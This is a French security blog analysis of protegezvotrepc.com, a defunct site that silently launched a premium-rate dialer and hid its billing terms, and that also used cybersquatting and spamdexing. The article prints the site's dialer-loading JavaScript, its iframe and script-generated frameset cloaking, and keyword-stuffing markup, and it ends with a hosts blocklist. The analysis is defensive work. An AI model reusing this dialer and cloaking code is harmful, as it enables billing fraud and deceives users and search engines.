Flux RSS - La vie du site - Nouveautés et mises à jour
Assiste.com - Sécurité informatique - Vie privée sur le Web - Neutralité d'Internet Assiste.com - Sécurité informatique - Vie privée sur le Web - Neutralité d'Internet

protegezvotrepc.com implantation d'un dialer

09.09.2020 - Protegezvotrepc.com implante silencieusement un dialer, fait payer sa prestation et récupère les données bancaires pour créer un abonnement payant à l’insu de l’internaute. Cette cybercriminalité démontre comment escroquer une population dans les pays où le RTC est dominant.

Ce site n'existe plus, mais reste une formidable démonstration de savoir-faire des cybercriminels et des manières dont on peut tromper et escroquer facilement des millions d'internautes, silencieusement.

Analyse de la page d'accueil du site « Protegezvotrepc.com ».

Vous pouvez tomber sur un site à priori intéressant. Regardez bien la page d'accueil de ce site :

Le site protegezvotrepc.com utilise crapuleusement, à l'insu de ses visiteurs et utilisateurs, un dialer
Le site protegezvotrepc.com utilise crapuleusement, à l'insu de ses visiteurs et utilisateurs, un dialer

protegezvotrepc.com à l'air propre. Il y a cette toute petite boîte avec un début de texte qui semble simplement donner le nom de la société éditrice de ce site. La boîte de texte est tellement microscopique que l'on ne peut rien lire en tentant de faire défiler le texte. Et il y a ce « Patientez ».

  1. Pourquoi protegezvotrepc.com me demande de patienter ? Que se passe-t-il pendant que je patiente ?

  2. Pourquoi protegezvotrepc.com cache quelque chose, tout en faisant semblant de l'afficher, dans cette microscopique boîte ?

protegezvotrepc.com dialer - protegezvotrepc.com - analyse des pièges de cette crapulerie

Analyse du piège : site payant

  1. Il existe un avertissement, mais il est caché.
    Faire un clic droit dans la boite de texte protegezvotrepc.com Sélectionner tout protegezvotrepc.com clic droit protegezvotrepc.com Copier protegezvotrepc.com Ouvrir son traitement de texte favori (ou le bloc-notes de Windows : Notepad) protegezvotrepc.com coller le tout :
    Voilà ce que l'on peut lire

    Éditeur Live Interactive

    Centre technique de paiement : Mediason . Contact : 04 56 58 94 00
    0836012015 1,35 Euro TTC + 0,34 TTC Euro / Min

    Pour accéder à ce service vous déclarez :

    • Avoir l'âge de majorité légale tel que défini dans votre pays.

    • Savoir que le site auquel vous avez accès par l'intermédiaire de ce dialer est un service payant.

    • La loi vous permet de télécharger, partager et utiliser uniquement les fichiers (Musique, Vidéo, Jeux, Logiciels...) dont vous possédez les droits d'utilisation ou diffusion.

    • Ne consulter ce service qu'à titre personnel

    • Vous engager à mettre en œuvre tous les moyens existants à ce jour pour empêcher un mineur d'utiliser votre ordinateur pour parvenir à ce service

    • Décharger l'éditeur de ce service de toute responsabilité si un mineur venait à accéder à ce site par négligence de votre part de quelque manière que possible.

    Donc :

    • protegezvotrepc.com est un site payant et nous payons dès que l'on arrive dessus, avant d'avoir eu le temps de comprendre de quoi il retourne car le « Patientez », c'est le chargement automatique du dialer, coupure de la communication Internet et rappel d'un numéro lourdement surtaxé immédiatement.

    • Cet avertissement, bien que caché, est probablement prévu juste pour avoir le mérite d'exister et contrer toute attaqe en justice (encore que toute attaque en justice soit complètement hypothétique puisque l'escroc en question réside à Montévidéo, en Uruguay, comme on peut le voir en faisant un « WHOIS » sur le nom de domaine protegezvotrepc.com !).

    • Il y a un « interressant » avertissement d'interdiction aux mineurs. Pourquoi diable protegezvotrepc.com, un site théoriquement de sécurité informatique, serait interdit aux mineurs ? En réalité, protegezvotrepc.com appartient à une nébuleuse de sites dont plusieurs sont de type pornographique et le dialer utilisé est le même pour tous les sites de ce gang.

    protegezvotrepc.com dialer - protegezvotrepc.com - analyse des pièges de cette crapulerie

Prélèvement automatique sur votre compte sans votre accord !

Abonnement mensuel prélévé automatiquement

Pour votre confort, votre accès sera reconduit à 39.98€ mensuel.

protegezvotrepc.com dialer - protegezvotrepc.com - prélèvement automatique sans accord

Je suis arrivé sur protegezvotrepc.com en faisant une recherche, avec Google, sur « EZ eTrust antivirus » et, effectivement, une URL de protegezvotrepc.com commence bien par eTrust-antivirus, mais on n'est pas du tout sur le site de eTrust (le site de la société Computer Associates [renommée depuis CA Technologies]).

h..p://etrust-antivirus.antivirus-protegez.com.ar/telechargements-etrust-antivirus/etrust-antivirus.php

Cette URL est une tromperie faisant apparaître 3 fois « eTrust-antivirus », un antivirus réputé, pare-feu et antimalware avec l'extraordinaire PestPatrol que vient de racheter Computer Associates le 16 août 2004. On est en 2004.

Lisons le code source de la page où nous sommes :

<iframe SRC="http://www.protegezvotrepc.com/entrer.php?w=1&c=n&id=frantivirus&m=s" ALLOWTRANSPARENCY="true" width="800" height="1000" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no" target="_blank"></iframe>

On voit immédiatement la présence d'un accès à un autre site, h..p://www.protegezvotrepc.com, dans un iFrame occupant la totalité de la surface-écran, donc on ne se rend pas compte du changement de site :

On remarque aussi la présence d'une balise « marquee », une balise non standard, ne fonctionnant que dans Internet Explorer, et permettant de faire défiler du texte. En regardant rapidement le code source, le texte soumis au défilement semble très long, mais de bon aloi - les liens donnés sont réels et vers des sites solides. Par exemple :

[PDF] S . G . D . N AVIS DU CERTA Gestion du document 1 Risque 2 ...Format de fichier: PDF/Adobe Acrobat - Version HTML
... CERTA Affaire suivie par : CERTA Paris, le 16 février 2004 N o CERTA-2004-AVI-040 AVIS DU CERTA Objet : Vulnérabilité de eTrust Antivirus Les informations ...
www.certa.ssi.gouv.fr/site/CERTA-2004-AVI-040.pdf
http://www.certa.ssi.gouv.fr

Il y a ainsi plus de 200 textes, soit plus de 1000 lignes, provenant d'une capture d'une recherche « eTrust-antivirus » avec Google. On va donc trouver dans cette page plus de 200 fois le terme « eTrust-antivirus ».

En regardant de plus près, le texte défile en noir sur fond noir (il sera donc invisible) et la balise « marquee » a une largeur de 5 pixels sur une hauteur de 10 pixels (elle est microscopique et indétectable). Donc la présence de cette capture n'est pas destinée au visiteur du site.

En réalité, le nom de l'URL qui contient « eTrust-antivirus » est du cybersquatting (une recherche Google permet de trouver qu'ils ont, à la date d'écriture de cette page, plus de 1840 pages avec des URL ainsi faites) et le contenu de chaque page de ce site contient plus de 200 fois le terme recherché. C'est du spamdexing afin de fausser les classements dans les moteurs de recherches. Le « poids » des mots « eTrust-antivirus » étant très important dans cette page, elle sera classée dans les premières réponses des moteurs de recherches. Je ne recopie pas le code source de cette page qui fait plus de 1000 lignes de long, certaines lignes étant, en plus, très longues.

En avril 2006, une nouvelle analyse fera ressortir que ce site pratique ce spamdexing à une échelle de plus en plus vaste et que les mots clés insérés sont aussi ceux des réels sites de sécurité ayant une bonne popularité. Ainsi, assiste.com fait les frais de cette technique qui vise à détourner le trafic Internet.

protegezvotrepc.com dialer - protegezvotrepc.com - Cyber squatting et spamdexing

Revenons à notre dialer. Lecture du code source de cette page : h..p://www.protegezvotrepc.com

L'appel au chargement du dialer est immédiat avec incitation à cliquer sur un "Oui" (pour lancer la communication dont vous n'avez pas conscience) qui les « couvre » juridiquement (c'est vous qui avez cliquez sur « Oui ») s'il vous venait à l'idée de porter plainte après lecture de votre note de téléphone (mais allez porter plainte contre ce maffieux résidant à Montévidéo, en Uruguay !).

On remarque également la présence d'un lien vers la lecture des conditions générales sur le site bien connu h...tp://ip.sponsoradulto.com/terms.php dont le nom suffit à comprendre de quoi il retourne. C'est la même maffia du Net qui œuvre dans le sexe, les faux utilitaires de sécurité, les jeux d'argent et les faux médicaments.

La manière de nommer les fonctions et les variables utilisées fait penser à une origine espagnole (condiciones, datos, desinstalacion, estadoboton, no_cargar, conectar...). On remarque également que la détection ADSL (qui ne supporte toujours pas les dialers) renvoie vers une autre méthode de consultation payante du site. On remarque encore l'appel à des applets Java externes (fichiers .js).

L'appel au dialer de protegezvotrepc.com

<base href="http://www.protegezvotrepc.com/fr/1/n/">
<html>
<head>
<script language="JavaScript">
setInterval("window.status='PROTEGEZ VOTRE PC'",5);

function condiciones(link) {
window.open('http://ip.sponsoradulto.com/terms.php','_blank','width=372,height=216,scrollbars');
}

function datos() {
window.open('http://www.liveinteractive.net/info/fr/', 'c', 'width=450, height=300, scrollbars=no, resizable=no');
}

function desinstalacion(link) {
window.open(link, 'd', 'width=615, height=420, scrollbars=no, resizable=no');
}

var estadoboton = 1;
var argstr = location.search.substring(1, location.search.length)
var args = argstr.split('&');
var estag = false;
for (var i = 0; i < args.length; i++){
if(args[i] == "g=si" || args[i] == "g=SI" || args[i] == "g=1")
estag = true;
}

var flag=1;
function detalle(i) {
if (document.layers) { // Set visibility for NN and IE
visible = 'show';
hidden = 'hide';
} else if (document.all || document.getElementById) {
visible = 'visible';
hidden = 'hidden';
}
x = 'Layer'+i;
if (document.layers) {
lay2 = document.layers[x];
} else if (document.all) {
lay2 = document.all(x).style;
} else if (document.getElementById) {
lay2 = document.getElementById(x).style;
}
if (flag==0) {
flag =1;
lay2.visibility = hidden;
} else {
flag =0;
lay2.visibility = visible;
}
}
</script>
<script language="JavaScript" for="ObjSysWebTelecom" EVENT="OnErrorConectando()">
conectando=false;
conectado=false;
</script>
<script language="JavaScript" for="ObjSysWebTelecom" EVENT="OnConectar()">
conectando=false;
conectado=true;

</script>
<script language="JavaScript" for="ObjSysWebTelecom" EVENT="OnDesconectar()">
conectado=false;
</script>
<script language="JavaScript">
if (navigator.appVersion.substring(0,1) >= 3) {
i1=new Image;
i1.src='conectando.gif';
i2=new Image;
i2.src='entrar.gif';
}

var timer;
var ready = false;
var conectando = false;
var conectado = false;
var no_cargar = false;
var no_recargar = false;

function conectar() {

if (no_cargar) {
var urlactual = new String(self.location);
if (urlactual.indexOf('?') == -1) {
window.location = urlactual + '?v=1';
} else {
window.location = urlactual + '&v=1';
}
} else {
clickentrar();
detalle(0);
if ((!conectando) && (!conectado) && (ready)) {
if (ObjSysWebTelecom.isAdsl==true){
document.URL = "http://adsl.protegezvotrepc.com/?capa=1281n&usuario=frantivirus";
}else{
ObjSysWebTelecom.Conectar();
conectando=true;
}
}
else {
if ((conectado) && (ready))
ObjSysWebTelecom.Desconectar();
}
}
}

function arrancar() {
if (ready && !no_cargar) {
ObjSysWebTelecom.Categoria="n1&wd=162&c=128&login=frantivirus&pais=fr";
ObjSysWebTelecom.inicio('frantivirus','4','http://dialers.syswebtelecom.com/2/fr/');
}
}

function setready (state) {
ready = state;
if (!ready && !conectando) {
if (estag) {
document.URL = history.back();
} else {
if (window.navigator.userAgent.indexOf("SV1") != -1) {
no_cargar = true;
return false;
}
var urlactual = new String(self.location);
if (urlactual.indexOf('?v=1') > 0 || urlactual.indexOf('&v=1') > 0) {
window.location = 'http://www.logicielsatelecharger.com/?id=frantivirus';
return false;
} else {
alert('Pour accéder à notre contenu vous devez cliquer sur \'Oui\' dans la prochaine fenêtre');
}
if (no_recargar) {
no_cargar = true;
} else {
var urlactual = new String(self.location);
if (urlactual.indexOf('?') == -1) {
window.location = urlactual + '?v=1';
} else {
window.location = urlactual + '&v=1';
}
}
}
} else {
timer = setTimeout("arrancar()",1000);
}
}

function clickentrar(){
if (estadoboton == 1) {
if(document.entrada) {
document.entrada.src = 'entrar.gif';
} else {
document.getElementById('entrada').value = "ENTRER >>";
}
estadoboton = 2;
} else {
if(document.entrada) {
document.entrada.src = 'conectando.gif';
} else {
document.getElementById('entrada').value = "CHARGEMENT";
}
}
}
</script>
<script type="text/javascript" language="javascript" src="/funciones.js"></script>
<script>
function showContract() {
var textAreas = document.body.getElementsByTagName("textarea");
textAreas[0].style.visibility = "visible";
}
</script>
<style type="text/css">
.lay1 {
position: absolute;
width: 346px;
height: 64px;
left: 50%;
top: 50%;
z-index: 2;
margin-left: -173px;
margin-top: -32px;
border: 1px solid black;
font-family: Arial, Helvetica, Sans-serif;
font-size: 14px;
background-color: #FFFFFF;
layer-background-color: #CCCC99;
color: #000000;
visibility: hidden;
}
</style>
<style type="text/css">
.idioma {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: bold;
text-decoration: none;
}
<!--
.t11px {
font-family: Tahoma;
font-size: 11px;
font-weight: normal;
}
a:hover {text-decoration: underline; color: #003366; }
a:link {text-decoration: none;}
a:visited {text-decoration: none;}
.v11px {
font-family: Verdana;
font-size: 13px;
font-weight: bold;
}
.a11px {
font-family: Tahoma;
font-size: 11px;
font-weight: bold;
}
.a11px:hover {text-decoration: none;
color: #000000;
font-family: Tahoma;
font-size: 11px;
font-weight: bold;
}
.buscador {
font-size: 11px;
font-weight: normal;
font-family: Verdana;
color: #0066CC;
background-color: #000033;
border-color: #0066CC #0066CC #0066CC #0066CC;
border-style: solid;
border-top-width: 1px;
border-right-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
-->
}
<!-- Blanco o Negro, que contraste con el fondo -->
.entrando {
color: #ffffff;

font-family: Verdana, Arial, Helvetica;
font-size: 10px;
font-style: normal;
font-weight: normal;
text-decoration: none;
}
a.linkpie:link {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: bold;
text-decoration: none;
}
a.linkpie:active {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: bold;
text-decoration: none;
}
a.linkpie:visited {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: bold;
text-decoration: none;
}
a.desinstalacion:link {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: normal;
text-decoration: none;
}
a.desinstalacion:active {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: normal;
text-decoration: none;
}
a.desinstalacion:visited {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: normal;
text-decoration: none;
}
a.desinstalacion:hover {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: normal;
text-decoration: underline;
}
.copyright {
color: #ffffff;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: normal;
text-decoration: none;
}


<!-- Un color de la Promo -->
a.linkpie:hover {
color: #333366;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: bold;
text-decoration: underline;
}
.certifico {
color: #333366;

font-family: Verdana, Arial, Helvetica;
font-size: 10px;
font-style: normal;
font-weight: bold;
text-decoration: none;
}


<!-- Otro color de la Promo -->
.linea {
color: #333366;

font-family: Tahoma, Verdana, Arial;
font-size: 11px;
font-style: normal;
font-weight: bold;
text-decoration: none;
}


<!-- Según diseño -->
.contrato {
visibility: hidden;
color: #666666;
background-color: #000000; border: 0px;
width: 382px;
height: 84px;

font-family: Arial, Verdana, Helvetica;
font-size: 10px;
font-style: normal;
font-weight: normal;
text-decoration: none;
}
.ve11px {
font-family: Tahoma;
font-size: 11px;
line-height: 13px;
font-weight: normal;
text-decoration: none;
}
</style>
<title>PROTEGEZ VOTRE PC</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body onload="clickentrar(); showContract();" bgcolor="#000000" text="#FFFFFF" link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0">
<div id="Layer0" class="lay1" style="top: 200px" align="center">
<table width="100%" border="0" cellspacing="5" cellpadding="0">
<tr>
<td>
<div align="center">
<b><font color="#000000">CHARGEMENT</font></b></div>
</td>
</tr>
<tr>
<td>
<div align="center">
<img src="barra_once.gif"></div>
</td>
</tr>
</table>
</div>
<div align="center">
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%">
<tr>
<td align="center" valign="middle">
<table width="516" border="0" cellspacing="0" cellpadding="0" align="center" height="296">
<tr>
<td align="center" valign="bottom" width="516" height="296" background="logo.gif">
<table width="214" border="0" cellspacing="0" cellpadding="0" height="98">
<tr>
<td align="center" valign="middle"><input style="font-family: Tahoma; font-size: 22px; font-weight: bold; border-top-width: 2px; border-right-width: 2px; border-bottom-width: 2px; border-left-width: 2px; cursor: hand" onclick="javascript:conectar();" type="button" name="entrada" value="PATIENTEZ"></td>
</tr>
</table>
</td>
</tr>
</table>
<p align="center"></p>
<p align="center"><textarea class="contrato" name="textarea">Editeur Live Interactive
Centre technique de paiement : Mediason . Contact : 04 56 58 94 00
0836012015 1,35 Euro TTC + 0,34 TTC Euro / Min

Pour acc&eacute;der &agrave; ce service vous d&eacute;clarez :

* Avoir l'&acirc;ge de majorit&eacute; l&eacute;gale tel que d&eacute;fini dans votre pays.

* Savoir que le site auquel vous avez acc&egrave;s par l&#146;interm&eacute;diaire de ce dialer est un service payant.

* La loi vous permet de t&eacute;l&eacute;charger, partager et utiliser uniquement les fichiers (Musique, Vid&eacute;o, Jeux, Logiciels...) dont vous poss&eacute;dez les droits d'utilisation ou diffusion.

* Ne consulter ce service qu'&agrave; titre personnel

* Vous engager &agrave; mettre en oeuvre tous les moyens existants &agrave; ce jour pour emp&ecirc;cher un mineur d'utiliser votre ordinateur pour parvenir &agrave; ce service

* D&eacute;charger l'&eacute;diteur de ce service de toute responsabilit&eacute; si un mineur venait &agrave; acc&eacute;der &agrave; ce site par n&eacute;gligence de votre part de quelque mani&egrave;re que possible.

</textarea></p>
<p align="center"></p>
<p>&nbsp;</p>
</td>
</tr>
</table>
</div>
</body>

</html>
protegezvotrepc.com dialer - protegezvotrepc.com - Dialer à chargement automatique

Le coup du dialer est reconduit (ici il se casse la figure puisque un iFrame avec Firefox, ça ne marche pas mais 90% des internautes sont équipés IE !
Et un abonnement à près de 40€ par mois est sous-entendu )!

ProtegezVotrePC.com
ProtegezVotrePC.com

Le coup des logiciels avec pignon sur rue pour appâter le gogo et se donner une apparence de virginité est reconduit (Norton, ZoneAlarm etc. ...)

Le téléchargement des logiciels gratuits et des versions de démonstration, officiellement toujours gratuites, est payant sur ce site attrape couillons !

Dommage ! Il n'y a pas d'extraterritorialité de la justice, en France, pour poursuivre cette bande en Uruguay !

protegezvotrepc.com dialer - protegezvotrepc.com - Que devient ce site en Juin 2006

Il existe des centaines de milliers de sites entièrement construits pour détourner le trafic, capter l'internaute et le dirriger vers des sites pièges de e-commerce crapuleux ou de crapuleries pures et simples (jeux d'argents et casinos, faux médicaments, logiciels crapuleux, etc.). Ces pratiques (hormis celles utilisant des parasites implantés dans les ordinateurs des internautes, comme CoolWebSearch, le hijacker furieux) utilisent massivement le spamdexing (violation des automatismes des moteurs de recherche) et le cybersquatting (millions de sites mirroirs, spam des forums et des blogs, etc.).

Quelques milliers d'entre eux sont inscrits en liste noire dans la rubrique cybersquatting ou dans la rubrique crapware de notre liste hosts.

Analyse : un site semble pointer vers assiste.com
Il pointe vers assiste.com. Bien... me direz-vous. Nous allons donc en parler dans ce sous-forum consacré à ceux qui parlent du site.

Eh bien, pas du tout !

Vous avez déjà rencontré ce site : protegezvotrepc point com
Dans les années 2006 à 2008 on le rencontrait à tous les coins de rue sur le Web, dès que l'on faisaitt une recherche.
Il a plus de 800 domaines (sites) satellites qui pointent tous vers son site principal et il utilise intensivement les mots-clés dans les urls de ses noms de domaine (noms de site) afin de capter le maximum d'internautes en détresse, cherchant une solution sur Internet avec un moteurs de recherche, pour leur fourguer quelque chose dont des logiciels crapuleux.
Cela fait des années que ce site m'énerve avec ses ventes de logiciels crapuleux camouflés derrière des ventes de trucs à pignon sur rue genre Norton etc.

Son logo, vous l'avez connu dans toutes les langues :

ProtegezVotrePC.com
ProtegezVotrePC.com - Français

ProtegezVotrePC.com
ProtegezVotrePC.com - Anglais

ProtegezVotrePC.com
ProtegezVotrePC.com - Américain

ProtegezVotrePC.com
ProtegezVotrePC.com - Italien

Cet escroc est identifié :

Caetano, Martin domains@liveinteractive.net
Live Interactive S.A.
Wilson Ferreira Aldunate Nº 1342, Oficina 102
C.P. 11.100 Montevideo
Montevideo 11100
Uruguay
customer@spanetworks.com

Il se sert de la popularité d'Assiste pour détourner du trafic de la manière suivante :

  • Il réalise et met sur le Net des centaines de sites qui ne font, chacun, qu'une page ou quelques pages, avec quelques mots clé répétés plusieurs fois ce qui donne à ces mots du "poids" au sens des critères de réponses pour les moteurs de recherche comme Google.

  • Ces pages sont écrites spécialement pour tromper les moteurs de recherches et ne sont jamais vues par les internautes car elles sont recouvertes automatiquement par un autre site qui va s'afficher en pleine page dans un cadre (un frame d'un frameset) utilisant 100% de l'écran du visiteur.

  • Pourtant, les moteurs de recherche avancés, comme Google, savent "lire" les frameset. protegezvotrepc point com camoufle donc son frameset dans un javascript qui va le générer à la volée. Voici le code

    <script language="javascript">
    document.write('<frameset rows =100%,* frameborder=NO border=0 framespacing=0><frame name=principal src=http://www.ultimosantivirus.com/?track=wanadoo2&acc=57333832&console=1 frameborder=NO marginwidth=0 marginheight=0>');
    </script>

Que trouve-t-on dans cette page que personne ne verra ?

  1. Une description du site :

    <meta http-equiv="Content-Type" content=" antivirus gratuit telecharger gratuitement windows xp , telecharger panda antivirus gratuit , telecharger avast antivirus gratuit, antivirus gratuit telecharger gratuitement windows xp , telecharger panda antivirus gratuit , telecharger avast antivirus gratuit , telecharger antivirus serveur gratuit , telecharger antivirus avg gratuit , telecharger antivirus avast gratuit , telecharger antivirus anti pub gratuit , telechargement titanum antivirus gratuit , panda antivirus telechargement gratuit crack , northon antivirus telechargement gratuit , telechargement panda antivirus gratuit , telechargement antivirus complet gratuit , telechargement logiciel antivirus gratuit , telechargement gratuit panda antivirus , telechargement gratuit antivirus 2005 , panda antivirus gratuit en ligne , assiste.free.fr p antivirus gratuit ligne antivirus ligne.ph , symantec antivirus ligne gratuit , secuser antivirus gratuit ligne , antivirus gratuit ligne panda , antivirus and en and ligne and gratuit , telecharger antivirus gratuit norton , crack norton antivirus 2005 gratuit , norton antivirus gratuit telecharger , telechargement norton antivirus gratuit , mise jour norton antivirus gratuit , logiciel gratuit norton antivirus tele">

  2. Puis, avec la balise h3 qui est une balise de "titre" en html ce qui donne, pour les moteurs comme Google, du poids aux mots qui s’y trouvent :

    <h3>antivirus gratuit telecharger gratuitement windows xp , telecharger panda antivirus gratuit , telecharger avast antivirus gratuit , telecharger antivirus serveur gratuit , telecharger antivirus avg gratuit , telecharger antivirus avast gratuit , telecharger antivirus anti pub gratuit , telechargement titanum antivirus gratuit , panda antivirus telechargement gratuit crack , northon antivirus telechargement gratuit , telechargement panda antivirus gratuit , telechargement antivirus complet gratuit , telechargement logiciel antivirus gratuit , telechargement gratuit panda antivirus , telechargement gratuit antivirus 2005 , panda antivirus gratuit en ligne, assiste.free.fr p antivirus gratuit ligne antivirus ligne.ph , symantec antivirus ligne gratuit , secuser antivirus gratuit ligne , antivirus gratuit ligne panda , antivirus and en and ligne and gratuit , telecharger antivirus gratuit norton , crack norton antivirus 2005 gratuit , norton antivirus gratuit telecharger , telechargement norton antivirus gratuit , mise jour norton antivirus gratuit , logiciel gratuit norton antivirus tele</h3>

  3. Puis on trouve des liens dont Google analyse chaque mot de chaque URL, ce qui donne encore plus de poids à la page en question. Ici il s'agit de
    "antivirus"
    "gratuit"
    "en ligne".
    Bien entendu, toutes les urls elles-mêmes sont fausses (il ne s'agit tout de même pas de pointer réellement vers ses concurrents et de leur donner de la popularité au sens de Google ! Pas fou du tout le protegezvotrepc point com - les "/" sont remplacés par des "_", les préfixes http et www. sont ignorés et une lettre est perdue) mais tous les mots clés ont été utilisés pour détourner le trafic (par exemple de ceux qui cherche la fabuleuse page des antivirus en ligne gratuits d'assiste.com) :

    telecharger gratuitement windows xp
    telecharger panda antivirus gratuit
    telecharger avast antivirus gratuit
    telecharger antivirus serveur gratuit
    telecharger antivirus avg gratuit
    telecharger antivirus avast gratuit
    telecharger antivirus anti pub gratuit
    telechargement titanum antivirus gratuit
    panda antivirus telechargement gratuit crack
    northon antivirus telechargement gratuit
    telechargement panda antivirus gratuit
    telechargement antivirus complet gratuit
    telechargement logiciel antivirus gratuit
    telechargement gratuit panda antivirus
    telechargement gratuit antivirus 2005
    panda antivirus gratuit en ligne
    assiste.free.fr p antivirus gratuit ligne antivirus ligne.ph
    symantec antivirus ligne gratuit
    secuser antivirus gratuit ligne
    antivirus gratuit ligne panda
    antivirus and en and ligne and gratuit
    telecharger antivirus gratuit norton
    crack norton antivirus 2005 gratuit
    norton antivirus gratuit telecharger
    telechargement norton antivirus gratuit
    mise jour norton antivirus gratuit
    logiciel gratuit norton antivirus tele
    telechargement gratuit norton antivirus
    telecharger un antivirus gratuit norton
    logiciel antivirus norton gratuit
    free norton antivirus gratuit

    Le code complet avec les liens est :

    <a href="antivirus_gratuit_telecharger_gratuitement_windows_xp/">antivirus gratuit telecharger gratuitement windows xp</a>
    <a href="telecharger_panda_antivirus_gratuit/">telecharger panda antivirus gratuit</a>
    <a href="telecharger_avast_antivirus_gratuit/">telecharger avast antivirus gratuit</a>
    <a href="telecharger_antivirus_serveur_gratuit/">telecharger antivirus serveur gratuit</a>
    <a href="telecharger_antivirus_avg_gratuit/">telecharger antivirus avg gratuit</a>
    <a href="telecharger_antivirus_avast_gratuit/">telecharger antivirus avast gratuit</a>
    <a href="telecharger_antivirus_anti_pub_gratuit/">telecharger antivirus anti pub gratuit</a>
    <a href="telechargement_titanum_antivirus_gratuit/">telechargement titanum antivirus gratuit</a>
    <a href="panda_antivirus_telechargement_gratuit_crack/">panda antivirus telechargement gratuit crack</a>
    <a href="northon_antivirus_telechargement_gratuit/">northon antivirus telechargement gratuit</a>
    <a href="telechargement_panda_antivirus_gratuit/">telechargement panda antivirus gratuit</a>
    <a href="telechargement_antivirus_complet_gratuit/">telechargement antivirus complet gratuit</a>
    <a href="telechargement_logiciel_antivirus_gratuit/">telechargement logiciel antivirus gratuit</a>
    <a href="telechargement_gratuit_panda_antivirus/">telechargement gratuit panda antivirus</a>
    <a href="telechargement_gratuit_antivirus_2005/">telechargement gratuit antivirus 2005</a>
    <a href="panda_antivirus_gratuit_en_ligne/">panda antivirus gratuit en ligne</a>
    <a href="assiste.free.fr_p_antivirus_gratuit_ligne_antivirus_ligne.ph/">assiste.free.fr p antivirus gratuit ligne antivirus ligne.ph</a>
    <a href="symantec_antivirus_ligne_gratuit/">symantec antivirus ligne gratuit</a>
    <a href="secuser_antivirus_gratuit_ligne/">secuser antivirus gratuit ligne</a>
    <a href="antivirus_gratuit_ligne_panda/">antivirus gratuit ligne panda</a>
    <a href="antivirus_and_en_and_ligne_and_gratuit/">antivirus and en and ligne and gratuit</a>
    <a href="telecharger_antivirus_gratuit_norton/">telecharger antivirus gratuit norton</a>
    <a href="crack_norton_antivirus_2005_gratuit/">crack norton antivirus 2005 gratuit</a>
    <a href="norton_antivirus_gratuit_telecharger/">norton antivirus gratuit telecharger</a>
    <a href="telechargement_norton_antivirus_gratuit/">telechargement norton antivirus gratuit</a>
    <a href="mise_jour_norton_antivirus_gratuit/">mise jour norton antivirus gratuit</a>
    <a href="logiciel_gratuit_norton_antivirus_tele/">logiciel gratuit norton antivirus tele</a>
    <a href="telechargement_gratuit_norton_antivirus/">telechargement gratuit norton antivirus</a>
    <a href="telecharger_un_antivirus_gratuit_norton/">telecharger un antivirus gratuit norton</a>
    <a href="logiciel_antivirus_norton_gratuit/">logiciel antivirus norton gratuit</a>
    <a href="free_norton_antivirus_gratuit/">free norton antivirus gratuit</a>

    Ci après, comparez le pseudo lien destiné à tromper Google puis le lien complet : c'est exactement la même chose, y compris les hiérarchies de mes répertoires ! Il recopie textuellement les urls des sites dont il veut détourner le trafic ! Pour Google, par exemple, c'est la même chose puisque les caractères "/" ou "_" sont ignorés.
    assiste.free.fr_p_antivirus_gratuit_ligne_antivirus_ligne.ph
    http://assiste.free.fr/p/antivirus_gratuits_en_ligne/antivirus_en_ligne.php

  4. Puis il recommence une troisième fois avec un paragraphe qui reprend le truc en <h3> vu ci-dessus. Ce qui donne, lors d'une recherche Google !

    ProtegezVotrePC.com
    ProtegezVotrePC.com - Et hop ! On est tenté de cliquer dessus - il y a "antivirus gratuits" et "assiste.free.fr".
  5. Et dans le cache de Google, ce qui a éveillé ma suspicion

    ProtegezVotrePC.com
    ProtegezVotrePC.com

Les domaines suivants, tous appartenant à ce gang, ont été ajouté dans la liste hosts

eresmas.com #tracking de protegezvotrepc (et de Wanadoo ?)
protegezvotrepc.com #crapware #tracking #cybersquatting
iris301.en.wanadoo.es #crapware #tracking #cybersquatting
tele67.en.wanadoo.es #crapware #tracking #cybersquatting
proteccionparatupc.com #crapware #tracking #cybersquatting
antiviruspourpc.com #crapware #tracking #cybersquatting
buscaprograma.com #crapware #tracking #cybersquatting
phoneaccess.com
absolutemessenger.com
onestepdownloads.com
gigsofdownloads.com
utilitairespc.com
absolutemessenger.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
alledownloads.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
antivirusinsurance.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
antiviruspourpc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
baixetudo.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
buscaprograma.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
customer.spanetworks.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
eresmas.com #tracking de protegezvotrepc (et de Wanadoo ?)
gigsofdownloads.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
iframe.phoneaccess.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
iris301.en.wanadoo.es #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
kampfgegenviren.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
members.antiviruspourpc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
members.utilitairespc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
